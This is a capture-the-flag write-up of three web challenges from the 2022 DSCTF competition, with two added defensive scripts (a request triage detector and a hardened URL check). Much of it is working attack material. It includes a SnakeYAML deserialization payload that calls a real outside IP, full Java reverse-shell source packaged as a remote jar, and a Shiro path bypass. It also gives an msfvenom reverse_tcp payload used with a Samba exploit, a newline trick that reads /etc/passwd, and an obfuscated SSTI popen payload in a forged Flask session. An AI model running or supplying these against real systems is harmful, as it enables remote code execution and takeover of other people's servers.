
2022 DSCTF: First Digital Space Security Attack-and-Defense Competition


The masters carried the team to the skies; this weak web dog is feeling humble online :(

easy_yaml

Visiting the HTML page gives the source code:


public ShiroFilterFactoryBean shiroFilter() {
    ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
    bean.setSecurityManager((org.apache.shiro.mgt.SecurityManager) securityManager());
    bean.setLoginUrl("/login");
    Map<String, String> filterMap = new LinkedHashMap<>();
    filterMap.put("/static/*", "anon");
    filterMap.put("/load/*", "authc");   // everything under /load/ is supposed to require authentication
    bean.setFilterChainDefinitionMap(filterMap);
    return bean;
}

@PostMapping(value = "/load/{id}")
@ResponseBody
public String loadyaml(@PathVariable(name = "id") String id,
                       @RequestParam(name = "persondata", defaultValue = "") String persondata)
        throws IOException, ClassNotFoundException {
    Yaml yaml = new Yaml();                            // default constructor: any global !!tag is instantiated
    Person p = yaml.loadAs(persondata, Person.class);  // user-controlled YAML is deserialized here
    return p.username;
}

public class Address {
    public String street;
    public Object ext;          // typed Object, so an arbitrary tagged object can be placed here
    public boolean isValid;
}

public class Person {
    public String username;
    public String age;
    public boolean isLogin;
    public Address address;
}

There is a YAML deserialization point; first build a probe to check whether the target has outbound network access. There is also a Shiro authorization bypass.

http://39.105.38.203:30113/load/%3badmin
POST:
persondata=username: Chris
address:
ext: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://150.158.181.145:3000"]]]]

Outbound access confirmed.
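From the defender's side, both weaknesses used above leave clear traces in request data: a `;` path parameter under the `/load/` prefix that the Shiro chain protects, and a `persondata` body carrying global `!!java...` tags that the default `Yaml()` will instantiate. The following Python triage script is an added example, not code from the challenge or this writeup; the request records in `SAMPLE_REQUESTS`, the callback host `attacker.invalid` and the function names are all constructed for illustration.

```python
"""Request triage for the two easy_yaml weaknesses: a ';' path parameter
used against the Shiro filter chain, and SnakeYAML bodies carrying global
(!!java...) tags.  Added example, not code from the challenge or the
writeup; the request records below are constructed."""
import re
from urllib.parse import unquote, unquote_plus

# Paths the challenge's Shiro filter chain protects with "authc".
PROTECTED_PREFIXES = ("/load/",)

# A global tag names a Java class (a dotted name); SnakeYAML's default Yaml()
# instantiates it.  Standard tags such as !!str or !!int have no dot and are
# deliberately not matched.
GLOBAL_TAG_RE = re.compile(r"!!(?:[A-Za-z_$][\w$]*\.)+[A-Za-z_$][\w$]*")


def shiro_bypass_indicators(raw_path: str) -> list:
    """Reasons a request path looks like a filter-chain bypass attempt."""
    reasons = []
    path = unquote(raw_path.split("?", 1)[0])   # decode %3b -> ';' as the container does
    segments = path.split("/")
    if any(";" in seg for seg in segments):
        reasons.append("';' path parameter in a segment (Shiro and Spring "
                       "handle it differently)")
    if any(seg in (".", "..") for seg in segments) or "//" in path:
        reasons.append("non-normalized path")
    if reasons and any(path.startswith(p) for p in PROTECTED_PREFIXES):
        reasons.append("path is under a protected prefix")
    return reasons


def yaml_tag_indicators(body: str) -> list:
    """Global YAML tags found in a (form-decoded) request body."""
    return GLOBAL_TAG_RE.findall(body)


def triage(record: dict) -> dict:
    """Classify one request record {method, path, body} as 'alert' or 'ok'."""
    findings = shiro_bypass_indicators(record["path"])
    for tag in yaml_tag_indicators(unquote_plus(record.get("body", ""))):
        findings.append("global YAML tag " + tag)
    return {"verdict": "alert" if findings else "ok", "findings": findings}


# Constructed records modelled on the requests in the writeup; the callback
# host is a placeholder, not a real address.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/load/%3badmin",
     "body": "persondata=username%3A+Chris%0Aaddress%3A%0A++ext%3A+"
             "%21%21javax.script.ScriptEngineManager+%5B%21%21java.net.URLClassLoader"
             "+%5B%5B%21%21java.net.URL+%5B%22http%3A%2F%2Fattacker.invalid%3A3000%22%5D%5D%5D%5D"},
    {"method": "POST", "path": "/load/42",
     "body": "persondata=username%3A+Chris%0Aage%3A+%2230%22"},
    {"method": "GET", "path": "/static/app.css", "body": ""},
]

if __name__ == "__main__":
    for rec in SAMPLE_REQUESTS:
        result = triage(rec)
        print(rec["method"], rec["path"], result["verdict"], result["findings"])
```

Run on the three constructed records, the first one is flagged for both the `;` segment under `/load/` and three global tags, while the ordinary `/load/42` post and the static asset pass. The tag regex is intentionally coarse: on a real service the fix is to stop accepting global tags at all (a restricted SnakeYAML constructor), and the detector is only there to spot attempts against instances that have not yet been fixed.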


Download the YAML deserialization exploit: https://github.com/artsploit/yaml-payload

Build the PoC directly and use a socket-based reverse shell (reference: "Reverse shell with Java | Spoock"):

package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() throws Exception {
        try {
            String host = "xxx.xxx"; // VPS IP
            int port = 3000;         // VPS port
            String cmd = "/bin/sh";
            Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
            java.net.Socket s = new java.net.Socket(host, port);
            java.io.InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
            java.io.OutputStream po = p.getOutputStream(), so = s.getOutputStream();
            while (!s.isClosed()) {
                while (pi.available() > 0) {
                    so.write(pi.read());
                }
                while (pe.available() > 0) {
                    so.write(pe.read());
                }
                while (si.available() > 0) {
                    po.write(si.read());
                }
                so.flush();
                po.flush();
                Thread.sleep(50);
                try {
                    p.exitValue();
                    break;
                } catch (Exception e) {
                }
            }
            p.destroy();
            s.close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}

Compile and package it, then host it on the server:

javac src/artsploit/AwesomeScriptEngineFactory.java   // produces AwesomeScriptEngineFactory.class
jar -cvf yaml-payload.jar -C src/ .                   // packages the contents of src/ into yaml-payload.jar


FLAG:flag{0831778476e75b691c4396d1297e748e}

easy_tou

The challenge opens with an include; get a shell with the no-temp-file technique from "hxp CTF 2021 - The End Of LFI?". That article runs system commands directly; for convenience, get a webshell first (see the project wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT) by changing the base64 in test.py to a one-liner webshell.


Get the kernel information:

http://47.93.179.206:30004/?file=/proc/version

Linux version 5.4.0-113-generic (buildd@lcy02-amd64-067) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #127-Ubuntu SMP Wed May 18 14:30:56 UTC 2022

Running as www; no flag found. Tried privilege escalation, but SUID and pkexec both failed. A port scan showed, surprisingly, that port 445 was open.


Found an article on exploiting port 445 on Linux: "CVE-2017-7494 Samba remote command execution vulnerability reproduction".

Drop a payload with msf directly; looking through /etc/hosts shows the route is 172.17.0.0/24, so add the route in msf.


Here, switch the target to command; the payload sent is a Python reverse shell.


Run it and a root shell comes back.


But files could not be read, so generate another payload and execute it as root:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=ip LPORT=6666 -f elf > root.elf

Listen with the handler, receive the shell, and then dir/cat is all that is needed.


Pingpngping

Log in with admin/admin; Flask 2.1.2, Python 3.8.

A piece of code is given; one look and I went numb:

from urllib.parse import urlparse
from urllib.request import urlopen
from flask import request, render_template

def ping():  # handler name assumed; the challenge shows only the body below
    url = str(request.form.get('url')).lower()
    urlarr = urlparse(url)
    for black in ['dict', 'file', 'gopher', 'ftp']:
        if black in urlarr.scheme:  # ParseResult fields are attributes, not dict keys
            return "NoNoNO!!!You can't use {} protocol".format(black)
    try:
        res = urlopen(url)  # the fetch itself; the response is never shown to the user
        return render_template("ping.html")
    except:
        return "Request failed!"

The username field looked like it might be SSTI-injectable, and I fuzzed until numb. The challenge decrypts the session to get username and renders it; decrypting the session definitely requires the secret_key, and with the key you can forge the cookie directly and then SSTI.


Spent a lot of time writing fuzzers for username and got stuck on this challenge.

Writeup: a newline bypasses the protocol restriction:

url=
file:///etc/passwd
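The newline works because the denylist inspects the raw form value while `urlopen()` inspects a normalised one: `Request()` strips surrounding whitespace (newline included) before choosing the handler, so the string that was validated and the string that is fetched differ. The Python below is an added example, not the challenge's code; `challenge_check`, `effective_url`, `hardened_check` and the example.com hosts are my own names and constructed inputs. Whether `challenge_check` itself lets the newline through depends on the interpreter's patch level, since bpo-43882 (Python 3.8.10 / 3.9.5) made `urlsplit` remove tab and newline characters, so the example asserts on the normalisation and on the hardened check rather than on that version-dependent behaviour.

```python
"""Why the 'ping' denylist falls to a leading newline, and an allowlist check
that does not.  Added example, not the challenge's code; function names and the
example.com hosts are assumptions."""
from urllib.parse import urlsplit
from urllib.request import Request

DENYLIST = ("dict", "file", "gopher", "ftp")   # from the challenge code
ALLOWED_SCHEMES = {"http", "https"}


def challenge_check(url: str) -> bool:
    """The challenge's denylist (True = request allowed).  On the raw input
    '\\nfile:///etc/passwd' the parsed scheme is '' on interpreters that
    predate bpo-43882, so nothing in the denylist matches."""
    parts = urlsplit(url.lower())
    return not any(b in parts.scheme for b in DENYLIST)


def effective_url(url: str) -> str:
    """The URL urlopen() really fetches: Request() strips surrounding
    whitespace, newline included, before the scheme handler is chosen."""
    return Request(url).full_url


def hardened_check(url: str) -> bool:
    """Allowlist check run on the normalised URL:
    1. refuse whitespace/control bytes instead of letting Request() strip them;
    2. normalise exactly as urlopen() will;
    3. require an allowed scheme and a non-empty host."""
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in url):
        return False
    try:
        normalized = effective_url(url)
    except ValueError:          # Request() raises "unknown url type" without a scheme
        return False
    parts = urlsplit(normalized)
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.hostname)


if __name__ == "__main__":
    for candidate in ("http://example.com/", "file:///etc/passwd", "\nfile:///etc/passwd"):
        print(repr(candidate), challenge_check(candidate), hardened_check(candidate))
```

Restricting the scheme is only the first layer for an endpoint like this: the host still has to be resolved and compared against internal ranges, and any redirect that `urlopen()` follows needs the same check applied to the new location.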

Trying it myself afterwards: first read app.py, which shows the key is passed in on the command line:

SECRET_KEY=str(sys.argv[1])

Read cmdline and get the key: Guess_fl4gName

/proc/self/cmdline

Then just forge it; borrow a payload:

{% print(url_for["__glo""bals__"])["__g""etitem__"]("o""s")["p""open"](url_for["__glo""bals__"]["requ""est"]["args"]["g""et"]("guoke"))["re""ad"]() %}

Generate the session:

python3 flask_session_cookie_manager3.py encode -s "Guess_fl4gName"  -t "{'username':'{% if(url_for[\"__glo\"\"bals__\"])[\"__g\"\"etitem__\"](\"o\"\"s\")[\"p\"\"open\"](url_for[\"__glo\"\"bals__\"][\"requ\"\"est\"][\"args\"][\"g\"\"et\"](\"guoke\"))[\"re\"\"ad\"]() %}{% endif %}'}"


Reflections

easy_tou: while working on it I scanned the ports afterwards with an AntSword plugin, and at the time I did not think 445 could be of any use. SMB on Windows could be tried with MS17-010, but on Linux it is really easy to overlook; the Linux version of EternalBlue, learned something. Next time, pay attention to the ports.

The ping one was purely because I hate SSTI and did not want to do it, but the overall idea was there: get the key -> forge the session -> SSTI -> bypass.

Also, real respect to guoke, the only man who solved every web challenge.